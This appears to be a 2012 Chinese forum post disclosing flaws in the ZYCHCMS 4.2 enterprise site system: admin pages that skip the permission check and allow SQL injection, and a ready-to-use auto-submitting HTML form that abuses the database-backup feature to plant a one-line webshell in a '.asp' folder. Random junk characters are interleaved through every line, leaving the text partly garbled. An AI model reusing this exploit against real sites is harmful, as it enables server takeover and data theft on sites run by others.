. e& h6 Z; ]9 X+ B3 ]( l/ x
\+ Z- ?: ^1 ~
0 f1 y# \1 C9 _1 T5 A8 ?2 y) R# b7 G: J* X7 G/ g" G% A: K
影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
8 L/ r$ O' v3 ~% v ①SQL注射漏洞, k1 w0 u7 x# ], \: k
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp# x3 B- Y1 M9 f# L. w! M# G$ |
漏洞原因:未过滤
+ l5 E7 |9 K. ` q 漏洞代码:6 w1 Y- _) w, ]' q& H" P8 H
都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。
7 |& R- f7 Y/ b$ u; T: N/ A) A 修复方法:在文件开头加入代码
$ Z2 \/ m3 O- z
) _8 P# J: r8 |; F1 Q1 f
5 r' K) R( f( E: \; ~②后台拿WBSHELL
8 B/ ^! ~% `8 }$ I) L+ v 进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。
: R: V% Y% H4 |6 @ 这里在网上找了一个,改了下,将就着用。
5 r" F ]4 u9 }5 f$ S 以下是代码本地提交代码9 V6 w* }2 t8 A+ M2 L& {; Y
1 V3 f" ~0 H! F2 c; t" g" n
6 w" x U$ J9 a% ]* D# V& x
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>
- G0 x( X" {! ^ <!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>* l) k/ m. I1 Y
<tr>8 e! {) S# i$ @% }2 {% X7 e: a% }, I
<td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>
) U7 E ]# Y* x) b </tr>
& n; u f5 x) N2 [8 ]9 z/ g <tr>
/ L$ K# v( C2 u <td bgcolor=”#FFFFFF”><span class=”back_southidc”>1 N) R9 l/ t! T$ n [' T
</span> b: `/ e$ I9 s$ v" x. {, |
<table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >$ ?! P& k0 a, P2 y7 y- i. e
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >' X( R& S4 h. v7 H2 L
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>6 M) @5 {% c [, e+ F4 J7 }6 X
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d3 w% R4 P" c5 W8 t; r5 M. l9 E
<div align=”left”>4 ^6 Y! l# W% V. o9 d
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />: w2 s. Z8 s1 p- s% z* \3 ~
<!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>
% A$ Y3 a. W# Y! }. U <input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” /> ?8 Z- j ~! f; t$ d2 D. g3 x3 d. _1 J
</div></td>& @' j! c; c7 X2 r& x: F
</tr>
- e" @" k' k; b+ \5 o <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>
4 p' K) [ }* [+ j2 P; @7 a <td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>0 z+ d8 l( g* [; a- R N3 @( A. o
<td class=”td”><div align=”left”>
7 @( i7 j7 L6 B6 O, v <input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
; L; `) M2 ^# X/ R) j& s [如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
! ?; n K4 h `% k* i! C+ Y </tr>1 e! C, X) H1 W! S$ q
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>1 {" G _7 ~& l" K8 }
<td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>: Y: _- R: L: `4 }) `6 n! c
<td class=”td”><div align=”left”>
8 S9 a, \5 U/ F, m" M <input type=”submit” value=”确定备份” class=”btn”. w8 X' H4 d* U3 A+ P" X/ B" c
</div></td>* s. h3 L4 O, o( h6 L7 _. a
</tr>
% f X! X) B7 x: X+ w8 l9 F) ~ </table></td></tr></form>4 ]6 r2 m6 V6 c& ~% k
</table>
" k2 n0 p, }. S5 J </td>
2 @5 ?: w k! q# o </tr>
1 D+ x8 V: d( r( o) n- o </table>
% _ i: d2 a0 R <script>
, x0 T5 h& U5 } document.all.add.submit();: e# c- D/ j. F b8 ?* _
</script>
% M$ j) p: G% U , l* O" [% x1 `( I& \- n
8 Y- ?) j- X# R. d
; r3 X2 ^4 L. c4 @4 z: t
; q- {: m( O9 p; r6 _4 @( _: {, \; c* S6 q
0 f b( x: D& C8 @( X/ ?
! Y, d# _; v7 F( o6 k3 p7 m# E p# p
& S( A% t1 g8 C$ B8 \" ]4 D
- @6 `8 O& L; J- F' D) N5 D- H k
|
发表于 2012-9-10 21:09:51
收藏
支持
反对